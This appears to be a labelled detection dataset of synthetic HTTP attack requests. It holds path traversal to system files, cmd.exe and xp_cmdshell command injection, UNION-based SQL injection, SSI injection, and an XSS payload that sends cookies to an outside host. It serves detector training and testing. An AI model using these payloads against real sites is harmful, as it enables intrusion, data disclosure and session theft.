User-Agent: Mozilla/6.9 (compatible; scn8w5na; Win98; to3w)
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 987x1282
Via: rar/9.8 239.128.120.38, FTP/9.7 www.caih.htm
Transfer-Encoding: compress
Upgrade: cei/0.7
Warning: 684 180.130.213.236 "aaSnnnneul" "Fri, 29 Jan 10 11:30:08 GMT"
X-Forwarded-For: 69.181.229.169
X-Serial-Number: 6641279926067
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47073
Start - Id: 44821
class: PathTransversal
GET /select-ONzNVazint.html?4eiaiqiea8t=362623&htEHdYtrenb=101512&xiaHl3lmiaddAt=..%2F..%2FUBData%2FMembers%2Fmembers.grp%2500&rLunnm=aett&aoLelstllel0uke=hnia&irPlabtuniBo=mxH.DN.ja5&beeutultser=rKvf_R9yc7&cdma4Ee=tlonetcaten&heqt=huEh78hnuoV&ssiaed=769449&JexecbwyII@iBj=icuDTw-nou4m HTTP/1.1
Host: 215.42.123.21
Connection: close
Accept: application/postscript;q=0.2, video/*;q=0.4
Accept-Charset: us-ascii;q=0.7, utf-8
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 92.163.213.217
Cookie: W2X-9gGQI=slRmwmdhq;id0csz=>eavz@8Nt;t5m3mhruur=e0iss
Cookie2: $Version="23"
Date: Sat, 21 Feb 09 14:40:57 CET
ETag: W/"cxFIN7xbm6PFzN9.QI"
Expect: 100-continue
From: ecsie0r@aat1r.com
If-Modified-Since: Sun, 07 Jun 09 04:15:13 CET
If-Unmodified-Since: Sun, 26 Dec 04 23:17:19 GMT
If-Match: "arvxUYUB2bHptKA2"
If-None-Match: "grIOzWd4mODJSc-sGhxE"
If-Range: "EXjq0t12jkaHZPYSy"
Max-Forwards: 89
MIME-Version: 9.8
Pragma: s=yaEdmem
Proxy-Authorization: NTLM YUhlQmxaMW5vM090THVlaXJyZXVldG5zRWJvOWhmbmplbm8wcld3c21udlpwZWU=
Authorization: eH4teM jsxnoc=5ihxiqi
Range: -7,891-,-651
Referer: http://www.4ioi.be/eroj/Xt0nitr/aled/eefsnerE/s6mEe74.mspx
TE: trailers,gzip;q=0.7
Trailer: If-Range
User-Agent: yjkSAE0 http://www.lX97nO.be
UA-CPU: MIPS
UA-Disp: 5327,238,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 123x704
Via: FTP/5.4 www.4ryeos.js, FTP/1.8 29.206.25.59:162
Transfer-Encoding: compress
Upgrade: neacoe/5.1, 7qfTia/9.7, negety/9.4, hbiry/6.4
Warning: 279 5.34.104.253 "ycytrdqnsuf" 
X-Forwarded-For: 65.58.42.42
X-Serial-Number: 13064
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44821
Start - Id: 44594
class: OsCommanding
GET /uAwnEeoniete2b6afcoe/eeti0aoi/9dua-X3H/czi4fRQhvti/tWC8Jgd2K2esdb/ye@Ij-LNs9hw/hQ6s/8UZt/4Rv58k/Mzbqybnc.jpeg?rlee=167.16.249.228+%7Cecho+%22test%22+%3Eevilfile.txt&dls=4792&jeonD=2217534&amcRde=tdt&rRncReya=ipdipeipp&oesh0=rqq&X4bNiA=26836937&IciframeL3s=t8iJ.nddOf8G&sOtbh=Rate&eM=kOalWasr%25tshutdownsmqwtaut&nuschnRst=ekgv HTTP/1.0
Host: 128.48.11.43
Connection: tbn3jTn
Accept: application/*;q=0.8, video/quicktime, application/*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-cache
Client-ip: 73.204.181.30
Cookie: hmv3sgeceThac=46;ao=dyopt&otkr-on
Cookie2: $Version="5"
Date: Mon, 22 Aug 05 12:23:38 GMT
ETag: W/"EceresNnukYMbJqcg@"
Expect: 100-continue
From: fn96a@esnteln.biz
If-Modified-Since: Sat, 31 Oct 09 05:38:24 UTC
If-Unmodified-Since: Tue, 04 Nov 08 06:34:13 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0474
MIME-Version: 0.9
Pragma: dmpst='nohhosV'
Proxy-Authorization: ozleh5 vvuEC=0hotw
Authorization: Basic ZGhFeXlpYWw6ZXJ0aXk=
Range: -2578
Referer: /s4omuG/aarheTai.zip
TE: chunked,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.5 (X11; U; Linux i586 7.7; ig-jJ; rv:1.7.1) Gecko/12670496
UA-Color: color32
UA-Pixels: 905x8117
Via: 1.3 www.drhp.htm, 6.8 237.35.251.140
Transfer-Encoding: snj8; nicerN=hnu2rds
Upgrade: irceh/7.1, rtal/2.6, Iaf/5.7
Warning: 383 www.Mece.jpeg:13 "gitirtep1tr" "Mon, 15 Feb 10 03:00:27 CET"
X-Forwarded-For: 84.212.52.145
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44594
Start - Id: 41904
class: SqlInjection
GET /@_nR_divtf73/tvM.3hKHJ5/xEotsojiirtuUbathogl/HdIBDchgolocationmhN/uHKYpFXV/hnu.zzYJxKautoexecW_./Dqgroup byneEkAejuFoy/gooz6nhecA/qA33b/wtofdp/oPQservicesOU6/thGSwsETDjc.tiff?vRaewhtes=himo&8cao0j1E=0516454254&pesNctast=154&s2s0odo7e5hno=%27+%29+++++UNION+++++ALL+SELECT+85op+%2C+msS++%2C+++++63td+++++FROM+++di++++WHERE+sitf+++++NOT+++IN++%28%27na4ic%27++%29++++AND++mito+NOT+++IN++%28++%27n4nns0Rnl%27+%29+AND+++++%27%27%3D++%27&mDagtnaIhAryd=yr&f6LeCrEuah=eselectt&OA6WqW=ats9mTawlywyr&sfn=2IfOnp&hrmeI8rdamLsw2d=owshuhu&cRnplpfspou=tusnn&mOtaronaEnlhq=2928&cSwthtib4llej=iefc-a%5Dtelnetmphttpsdtu&e1eaee=ai2ucsueostm&tpniaow4y=a8Lbvt0-KKN HTTP/1.1
Host: 136.132.67.225:105
Connection: keep-alive
Accept: audio/*, video/*, application/zip
Accept-Charset: euc-tw, hz-gb-2312;q=0.6, ks_c_5601-1987
Accept-Encoding: gzip;q=0.9
Accept-Language: 4aE-l6;q=0.6, f2ra-he;q=0.6, ohuiGi-irdusssi
Cache-Control: max-age=76
Client-ip: 199.227.44.84
Cookie: hthmaeu=f5=;4t=i c;sw3eosarty=eket8Pepxmlstylehhband4
Cookie2: $Version="83"
Date: Sun, 01 Feb 04 21:43:05 CET
ETag: W/"NqsDhYv0afOW86tr"
Expect: nvsci=uffmeHo
From: whodpi@rrheriuA.net
If-Modified-Since: Tue, 19 Jul 05 21:15:05 GMT
If-Unmodified-Since: Sat, 10 Nov 07 23:23:12 GMT
If-Match: "xgcg6lFX8YmoD1R"
If-None-Match: *
If-Range: Sat, 15 Nov 08 11:01:21 UTC
Max-Forwards: 00
MIME-Version: 4.7
Pragma: 2=et
Proxy-Authorization: NTLM ZXI5aW5vc2VsdHJadGxldmVnYXJlZWFvYXVrczYxaXhPaXRlOA==
Authorization: Digest cnonce="rjl8"
Range: 814292-
Referer: /EerObeoi/rrbsLa/a1hrjh/kembrt/l1Hmee.php3
TE: trailers
Trailer: Via
User-Agent: Mozilla/5.3 (Windows; U; Win 9x 3.2; xe-he; rv:0.7.2) Gecko/06497535
UA-CPU: MIPS
UA-Disp: 421,960,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 9010x724
Via: aHg/1.9 www.dlooiew.tiff, atum0y/5.7 29.37.83.123, 6.6 19.238.102.28:7
Transfer-Encoding: identity
Upgrade: ejskmd/8.1, itcsut/3.9, ooo/5.9
Warning: 583 141.118.219.160 "kIn4liE" 
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 850343
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41904
Start - Id: 40882
class: SSI
GET /cTw.v.oRVmnc/fRv3gy.nullservicesSetcU/dtseaahssn9asensle.htm?eos17=aTVS&0r@_=oueacnna%27edhn&on=edjo&assHhonNx=%3C%21--++%23odbc++statement+%3D++++%22select+++eq1vhd00%2C+++++qaserzp%2C++++tirhI++from+++Edrldaecy2+++++order++by+0%2C++86%2C+++6%22+++--%3E&oewtEa8ebew=c454eNKdm-&lfa2Detl=+esscriptttye9flinkscript%24pKnedocumenthy&wWsrcmaue=qazs%26i2oou%28%27brnhOi&UUI_QfB=eotelneth&Fw%urJH=wt4%25580t9&T5lm4t7ara=ni97C5z%28vydeta&aeh=C1eiecgHroeiuEiln%3Aar&js=fm0u&0Ehp=76212 HTTP/1.0
Host: www.cmcH.uk
Connection: close
Accept: text/*, application/*;q=0.3, image/*;q=0.3
Accept-Charset: shift_jis;q=0.6, iso-8859-1, iso-8859-2, iso-8859-9
Accept-Encoding: *
Accept-Language: s-b, rbslo-inrbcn;q=0.7, he9La-n
Cache-Control: no-store
Client-ip: 183.81.150.211
Cookie: homeiNimg_rcp-_=lnsedmf1Eunrs;WG-JGFA=asock_streamn;Telboaer=eRVm5byi;te88nikrctc2tiH=79;sa4mj3=urlo;oElop4v=rxZX0oyvDF
Cookie2: $Version="14"
Date: Mon, 08 Jan 07 24:49:06 UTC
ETag: W/"cdUEMz1rdtb6L7v"
Expect: Bsieuw=kptnu;mohtt
From: ba0d@eoei.uk
If-Modified-Since: Wed, 29 Oct 08 16:03:43 CET
If-Unmodified-Since: Fri, 15 Feb 08 18:22:04 UTC
If-Match: "4e3CRdTlVzGBZjWDj"
If-None-Match: "9LocAgY1rKtsBwKDR"
If-Range: Sun, 24 Jun 07 17:47:15 UTC
Max-Forwards: 901
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic dHQybmlKOmVtc3dzckFy
Authorization: Basic dG9pZGVvZW06amlzVGhhdA==
Range: 453-748
Referer: /3onq/8tcceoez/rthlhrot/2meitat.mp3
TE: deflate;q=0.9,trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/6.2 (Machintosh; U; Mac OS X 4.3; tw-n4; rv:4.9.9) Gecko/67882919
UA-CPU: x86
UA-Disp: 8926,1457,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5993x410
Via: 1.4 151.187.253.95
Transfer-Encoding: identity
Upgrade: i72f/4.9, Zi2a/5.6, sifx9/9.1
Warning: 063 170.129.30.215:3080 "tttenlbdte1UerRsne1h" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 71520
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40882
Start - Id: 35395
class: SqlInjection
GET /zli/aI9lNJmwg23fVwvt-@6D/afhdmtE7sernatnoMeb/iShYx.vPdquJgMujp/oxh22t01th9hEMesseto/ooQUvXvHQqC2ADD/e0s4gr/O94/iUr.jpeg?nl=sweirdhIa9giaO&auq=s1WX_i&hslb7Roym=bhkiuns4peehOe&kS.KEh=and+++0%3C%3E%28select+count%28*%29+++++from++we+where+erv%3C%3E%29 HTTP/1.0
Host: www.rriir.de:37
Connection: keep-alive
Accept: audio/x-wav, image/*, video/quicktime;q=0.2
Accept-Charset: *;q=0.3
Accept-Encoding: deflate, deflate
Accept-Language: Euhs-l2ob4l;q=0.9, b-loRnlasi, n7d-mi, neet-rOoi;q=0.9, zaamtE-9pyena
Cache-Control: max-age=9
Client-ip: 42.209.93.236
Cookie: ati5steu=xtermmnir;ploEs=08516422;eo=71
Cookie2: $Version="936"
Date: Thu, 04 Jan 07 12:35:52 GMT
ETag: W/"1zpGD6YngN8ikJCz7Uio"
Expect: tqnkotl=tntt5;qeotah=wGst
From: 0boosr3e@ftEeuLd2wt.it
If-Modified-Since: Thu, 30 Mar 06 02:30:26 CET
If-Unmodified-Since: Thu, 11 May 06 05:38:56 CET
If-Match: "fRJc2.6RTWccVquj"
If-None-Match: *
If-Range: "5LkSCrlPbaT_H-Ke@"
Max-Forwards: 1
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWlEb1RhQXNodXNobmt0cmVlNnMxbnVoc0ljb2xsaWdjZW1z
Authorization: Tjehtr umimnIt=4idd
Range: 24492-281270
Referer: /aohrf/brXxwUIr/aeno1hhN.pdf
TE: trailers
Trailer: Pragma
User-Agent: mid9S00.Cx http://www.4tte1i.be
UA-CPU: Sparc
UA-Disp: 962,2383,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 177x860
Via: FTP/2.4 88.175.11.153:85, 3.7 84.58.189.38
Transfer-Encoding: zsrg; eekne=uNvccIa
Upgrade: nk2i4r/2.9, ipzf/4.9
Warning: 933 134.218.228.163:17 "vrrEhe411r" 
X-Forwarded-For: 31.250.119.48
X-Serial-Number: 840148
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35395
Start - Id: 44361
class: OsCommanding
GET ..%c1%8s...%c1%8s..%c1%8s..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.e3elriioT.de
Connection: eIolseto
Accept: audio/basic, application/*;q=0.0
Accept-Charset: *;q=0.0
Accept-Encoding: identity;q=0.7, identity;q=0.7
Accept-Language: o2k-dosT
Cache-Control: min-fresh=65
Client-ip: 85.70.71.191
Cookie: Btizoslto91er=cmdyxli
Cookie2: $Version="4"
Date: Sun, 21 Feb 10 13:10:00 UTC
ETag: "Mp0.89pM9u@RmCsjjuH"
Expect: eont=ltkcnd;tS3s
From: ks7mao@6esnaehk.it
If-Modified-Since: Mon, 05 Apr 10 24:42:55 GMT
If-Unmodified-Since: Fri, 09 Nov 07 02:11:29 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7402
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: iHauOk iIeethi7=3ndhh
Authorization: Digest response="750EEeFddf3CD4eDAAABC5d54CeAD4BE"
Range: -126597,56874-704
Referer: /0esaxr4/e5pqN/utobIrot/heauzv/Gmro.pl
TE: gzip;q=0.8
Trailer: Max-Forwards
User-Agent: Mozilla/9.6 (Machintosh; U; PPC 7.0; e7-ve; rv:0.4.3) Gecko/34514189
UA-CPU: x86
UA-Disp: 116,364,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 673x399
Via: HTTP/0.9 99.119.56.164, 4.7 www.ilunm.shtml, ftMc/2.3 www.nsoe40bp.jpg:4
Transfer-Encoding: compress
Upgrade: 4et/8.8, is0/1.7, mseCwu/8.0
Warning: 732 www.nidnAqoh.js "estaore5gordngon0ar" "Fri, 26 Nov 04 13:07:04 GMT"
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 94309776768789
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44361
Start - Id: 44887
class: PathTransversal
GET /oiudP0LK/euniitTebrer/jWjWxQo4dF6sh/s2yDgM/r2sdnaf2awert3pvuhx/IqSmochawZUPtmp58JA-/8ndwpite/saooz/meltfnxmnAful.mspx?Votc-p=sbWyiJjge&hatieaea=iihi34tsaho2BO&aksSuih9hn=o2&dhfsdnA=Cridinputrys%288tE&e8eEei=oDC-&lfnuch=unioncwhXouuh+%3F&mreelcUei=doc%28+++++file%3A%2F%2F%2Fc%3A%2FlyOmo%2F1ahcEc.xml++%29&hqmhisuNbsUs=rht%24dX%26urup&ZjcL=aLR5fHCLeM&etc=083463 HTTP/1.0
Host: www.reainaAw.com
Connection: close
Accept: video/mpeg, image/*;q=0.2, text/xml
Accept-Charset: x-mac-hebrew, x-mac-turkish, iso-2022-kr, windows-1253;q=0.6, ks_c_5601-1987;q=0.9
Accept-Encoding: 
Accept-Language: r5arj-Xpn;q=0.4, lnreb-Nstits;q=0.6, 8e-se;q=0.8, httnees-a
Cache-Control: max-stale=89146
Client-ip: 28.173.55.36
Cookie: b5nss=CAqa;Fntat5wnTb=102;ehhWsaEsdpzhSn=83;sicclqtnt5dct=Ex;2dedetVeL0htHo=caU6tesgytea
Cookie2: $Version="47"
Date: Wed, 27 Aug 08 03:14:45 GMT
ETag: "Fg6uxv@CUmKOi65"
Expect: dhintj=ktepac;GeA9nrb
From: lalrk0d@mOge.gov
If-Modified-Since: Wed, 14 Feb 07 07:17:28 UTC
If-Unmodified-Since: Fri, 18 Jun 04 15:55:03 GMT
If-Match: "WBL@5hL_Hit7g2QoC.p"
If-None-Match: ".nB@xyCMmIPqCRbx"
If-Range: "dqm2ilIOg7eS4FBj"
Max-Forwards: 4
MIME-Version: 2.7
Pragma: nE=R3r
Proxy-Authorization: Digest opaque="nwijehr"
Authorization: Digest cnonce="1Emt"
Range: -41,56231-,-8575
Referer: http://lemysEl.de/ynrdxi4/ovwts/elyse.mp3
TE: trailers,chunked,gzip
Trailer: Expect
User-Agent: Mozilla/6.5 (X11; U; Open BSD i586 5.0; Nr-ae; rv:4.3.0) Gecko/59246877
UA-CPU: StrongARM
UA-Disp: 4734,136,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 134x0521
Via: HTTP/5.1 202.239.31.95:7526, HTTP/5.7 110.23.237.129
Transfer-Encoding: identity
Upgrade: a04E/0.2, dOen6p/3.6
Warning: 919 218.70.108.162 "ndpaastlweaihe5" "Thu, 07 Apr 05 15:20:50 UTC"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 44887
Start - Id: 44982
class: PathTransversal
GET /SVSs.4-/nClaab0ytstaaEI/tNSg/wA4lkhqRDL1_TrP@..d/aphva7o/xterm14MJsock_streamVmH8t6MmY/subcwln/eDW49_FBsBjHmDD7vl/cRDLZbY.cgi?echoZ8mQ_copyw=%5Dagwarc&earNfeorsdaf=hvy%25dE2ioye&t1ioeAh9x=doc%28file%3A%2F%2F%2Fc%3A%2Fnyf1d%2FBnoeBsi.xml+++%29&x1lter98orseso=rRahsf3thnh6da HTTP/1.1
Host: www.olvLec.st
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: windows-874
Accept-Encoding: 
Accept-Language: n8mhhis7-kts
Cache-Control: no-store
Client-ip: 64.160.89.221
Cookie: nfse99=72458279;aahY=40atA5hlooO<;ycstoh9gntt=Des;ynt-it.dhZposition=Eruhscuwe4b;tiEranoaeI23=o
Cookie2: $Version="2"
Date: Mon, 09 Nov 09 11:35:24 UTC
ETag: "Xe0xrZEXUIVTJ67w.0"
Expect: wpte
From: ytsw@heeaiueil.de
If-Modified-Since: Wed, 11 Aug 04 02:16:38 CET
If-Unmodified-Since: Mon, 17 Jan 05 15:03:07 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 08 Sep 05 12:13:08 UTC
Max-Forwards: 5653
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest cnonce="nhtuo"
Authorization: Digest algorithm=MD5
Range: 73-,999598-14093
Referer: http://www.jateceo.biz/IxTu/cuvoihi.php3
TE: trailers,chunked;q=0.5
Trailer: If-Match
User-Agent: Mozilla/5.5 (Machintosh; U; Mac OS X 8.0; eS-sl; rv:2.0.9) Gecko/33307498
UA-CPU: 68000
UA-Disp: 272,747,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 298x3014
Via: 0.4 www.o6psisrg.png, HTTP/6.0 42.34.251.164, 6.5 www.luTfyi.css
Transfer-Encoding: identity
Upgrade: tOgk/7.2, 57lv/3.4, zpxc/7.9
Warning: 066 www.nilrhde.jpg "jrIghnmascnrodusoxo" "Thu, 06 Oct 05 03:19:48 UTC"
X-Forwarded-For: 21.25.17.174
X-Serial-Number: 02029682111674011013
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44982
Start - Id: 44784
class: PathTransversal
GET /r@aXP6X/orgln/nY3dFtu@aT303/6nwpAV/tbKNEO11b7k1h/openRg/i.IOX1qO86eY5yet/ez9mg0gJTgGiOdhHC/sMLv./iq/m0C_-GZ0dyHJ@A0lB/nugopsrckzdalnmNr.shtml?1stc=reIsln65E8mrfc&tzz=87364496&4etal=o7T-5zM1XIHH&7eemacmeoenrgt5=1&EOyztioFqSrh=172&ctie3osimosoe=84409235&i8=22499942&tosdcmd2diaxhp=nC78EfL6gyo&a4roziboayeyoch=bn+clv2&cY4Oe2soulo=doc%28+file%3A%2F%2F%2Fc%3A%2Free%2Fk2dn.xml+++%29&ioeebtRs3hi=Lme%3F7aoadbcdocumentrn&oclh2OCdpi5dii=h%3E&nthrdz5tl0ab=SHNlfdrd0SiYn&w2lE=14852 HTTP/1.0
Host: www.attH.com
Connection: amab
Accept: video/quicktime;q=0.0
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.7
Cache-Control: max-age=7382
Client-ip: 108.193.198.116
Cookie: 7yO-0dG90a09d=055;eei=1eoeT;atity3l7ofi=simopenEaqf;tosNfEmtiwe=8;emebaeNt=tZtZLUu-LeRY
Cookie2: $Version="24"
Date: Sat, 24 Feb 07 21:06:51 GMT
ETag: "iFE2lKQFDoEmCoaqzw"
Expect: 100-continue
From: Cmaxdcp@rimabEod.be
If-Modified-Since: Sun, 28 Aug 05 15:24:59 CET
If-Unmodified-Since: Wed, 23 Jun 04 13:11:17 CET
If-Match: *
If-None-Match: *
If-Range: "kkjXyaYb9_QMuAyd@wAE"
Max-Forwards: 0480
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: NTLM c0lyb3NlYTRVYWluMmhpY3d0YnRCZXRUd3l0dGNlb2RvdXRyZGx2cnlh
Authorization: Basic bnRydEJlQTpxbWRR
Range: 7-19,-611,-2366
Referer: /torcdsj/aort.rar
TE: deflate;q=0.1,trailers,deflate;q=0.7
Trailer: Expect
User-Agent: ufr6ge2tndoelNns
UA-CPU: MIPS
UA-Disp: 3445,5667,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 822x152
Via: 1.2 160.216.253.69
Transfer-Encoding: identity
Upgrade: xdn/6.9, zath/4.3, enftae/3.8, tsot/2.4
Warning: 136 www.f72ts.jpeg "daakn3ltgiptelaits" "Sat, 10 Oct 09 20:12:41 UTC"
X-Forwarded-For: 87.170.85.167
X-Serial-Number: 2157159271334
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44784
Start - Id: 35331
class: SqlInjection
GET /om1Ybrzbr4i35aaynmdc/tA4I_FRxMMu2fy32/wEGnRdX4fBmP/eAeeaairddithssmEoe0/Tentorroakh6nl/d1lnseadeqheAoilo6he/7904A0tPSoI/nmjdqdennwoslibe.msf?osF@=63389&Diigsse=88430006&tu=%27+OR+%27smarat4%27++%3E+%27S&oduEWN3=6&lchi=d&so95Fiessakprt=Cs&camiendt6rytt=le HTTP/1.0
Host: www.mionDma.be
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.5, identity, identity;q=0.7
Accept-Language: *
Cache-Control: no-store
Client-ip: 85.135.241.126
Cookie: caAslri=683
Cookie2: $Version="17"
Date: Wed, 25 May 05 08:58:10 GMT
ETag: "QOvh8ehD1t657W06o5"
Expect: 100-continue
From: atozRhO@AwAlyrse.it
If-Modified-Since: Fri, 02 Sep 05 12:31:31 GMT
If-Unmodified-Since: Sat, 27 Aug 05 21:39:06 CET
If-Match: "KvFFr2cdC@cpzIJyO_gF"
If-None-Match: *
If-Range: "BM1Ustp4NmIMcKnK"
Max-Forwards: 7698
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: h4ImO6 ttdnx=rtunlw9
Authorization: h9ei bafNUb9a=pgnsrz
Range: 16442-228208
Referer: /idWa0ht.nsf
TE: trailers
Trailer: Via
User-Agent: uoer0ixi
UA-CPU: StrongARM
UA-Disp: 703,585,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 5578x419
Via: FTP/5.5 www.7qfsea.htm
Transfer-Encoding: gzip
Upgrade: msSEA/8.6, izzty/7.9, ohTa/9.3, te3/1.4, xje/3.3
Warning: 635 237.151.216.13:8 "tstkg" 
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 31934378445962410
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35331
Start - Id: 47534
class: XSS
GET /xr/Ausr1OC_1A/haHYQ/tc_vPMzVD_cvsvRHC/pcacj@zKRTDjNQp/rYYP9kFPe/Edmwszsnoeans/fToko/omrTn1a3Awo/nmN_-h2XpwCgyG7@3QO/eOYJq.Rt/t6eEmsohLot0darm.sh?ztitica8l=%3Cimg++src++++%3D%22+mocha%3A%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.tave.com%2Fcgi-bin%2Faset.cgi%27%2Bdocument.cookie%29%3B%5D+%22%3E&inhf3eOcc=2002&anvwvetIWr=s&e8h1l1meces=outmpaD&iurm=Ltnpc&safeiesasA=eur4gsm9r&v6=oJtUC96I5h&titrexLqilrs=ln&u3eB3i=a+%40 HTTP/1.1
Host: www.Emevge.it
Connection: close
Accept: */*
Accept-Charset: shift_jis, iso-8859-8-i;q=0.9
Accept-Encoding: compress, compress;q=0.8, compress;q=0.6, compress;q=0.0, gzip
Accept-Language: 7heM-z, ht-cr;q=0.1, l0aVeLE-hzgn, n-AgwjN;q=0.1
Cache-Control: max-stale
Client-ip: 37.55.220.136
Cookie: 69QiKtp=e;C2s6e=o-
Cookie2: $Version="0"
Date: Tue, 17 Feb 04 16:09:15 UTC
ETag: W/"MF.rOlxIiF0Dx6w"
Expect: pnInt
From: rxai5au@cfrdhneel.st
If-Modified-Since: Mon, 13 Mar 06 22:45:17 CET
If-Unmodified-Since: Wed, 25 Feb 04 14:53:05 UTC
If-Match: "JB@tTM7-v87QCR89Sz_"
If-None-Match: *
If-Range: "UL_xPTr96AZwl97pC"
Max-Forwards: 8875
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.nihe.biz/7s36/4eafim5e/iflioc.php3
Authorization: Irtno s0ohameh=vleani
Range: 924-,916951-
Referer: http://bAEq0.com/mlcoao/upeld/n0urI/garsnft.html
TE: gzip
Trailer: TE
User-Agent: Mozilla/5.1 (Windows; U; Windows NT 0.1; 4s-o4; rv:7.4.2) Gecko/50759399
UA-CPU: 68000
UA-Disp: 050,2452,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2187x3503
Via: 7.5 39.34.171.134, 0.0 www.hfnpceem.gif
Transfer-Encoding: a7ut; derLnT=bsferx
Upgrade: atsa/8.3
Warning: 758 232.178.55.106 "aerbantiefsyete" 
X-Forwarded-For: 119.148.205.131
X-Serial-Number: 870651819
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47534
Start - Id: 45817
class: PathTransversal
GET /scr2aGQm/WBpG/ld.asp?RoVupdate=274&eereoc9sEcnssh5=+%24r&rKalo=oh&ctai1=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&CEVtD=kdontetcL&3Jatstinele9o=s2APuNNYF&t1t7i=apBmCBsGu&ejtre=94&uyxl4Itl=911423 HTTP/1.0
Host: www.aebDs.ch:21064
Connection: Eizl
Accept: */*
Accept-Charset: x-mac-chinesesimp;q=0.8, x-mac-roman;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 38.230.25.170
Cookie: 9et=871;ulmie0nr=t5hY
Cookie2: $Version="2"
Date: Fri, 16 Apr 04 02:58:52 UTC
ETag: W/"UeVdKYywRQ.A6wz"
Expect: 100-continue
From: rpAl@yhsq9eT1.st
If-Modified-Since: Sun, 18 Apr 10 10:38:35 GMT
If-Unmodified-Since: Fri, 25 Apr 08 02:56:58 GMT
If-Match: *
If-None-Match: "c3LQwWVPuEMKRCWH0gf"
If-Range: Fri, 16 Sep 05 07:40:19 CET
Max-Forwards: 21
MIME-Version: 1.8
Pragma: tiyrnu='ee8cq'
Proxy-Authorization: NTLM UGFBdGk4c3ZhNWk0b290ZXRodGVvb2N0UzFtT2lveXJvc2Ru
Authorization: Enne e6ota=ceehpe
Range: 2-5,-391
Referer: http://www.y3utdA.be/treesyh.tiff
TE: trailers,deflate;q=0.4
Trailer: Host
User-Agent: w0_dNs1xug http://www.oyalehm7.be
UA-CPU: PowerPC
UA-Disp: 742,2997,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 8704x3840
Via: 7.0 21.39.153.126, 6.2 165.165.27.229:3
Transfer-Encoding: deflate
Upgrade: T7eg/6.6
Warning: 348 176.99.74.150 "C9nbizlettg" 
X-Forwarded-For: 20.38.1.164
X-Serial-Number: 97437776345
----: ---------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45817
Start - Id: 35048
class: SqlInjection
GET /XO@Zixjcx/oSG/ocUnLGYMXRl1/e87z@QC@Xe4QX.Wd@gy./ek2DduoI/feoX0OedLNpz65gf/ox.zJPcISeoq/pnv9hi/6tekwclRm/rur-Rb77.css?kaEE=8650&lr=p2nnnh8%246SwTg&rdt8sujtTle=9e7emiframefodtyrriaT%5DVt&klts=phpie%7E&dopq=%27%3BEXECmaster.dbo.xp_cmdshell%27cmd.exe HTTP/1.1
Host: www.rAnlrskhd.de:80
Connection: keep-alive
Accept: video/*, audio/*;q=0.3
Accept-Charset: *;q=0.5
Accept-Encoding: gzip;q=0.5, compress
Accept-Language: atmhN-hebhdr;q=0.1, n0t-rraiekws, reYl-eeaieS;q=0.5, Atu90Dep-r
Cache-Control: max-age=76
Client-ip: 175.67.198.190
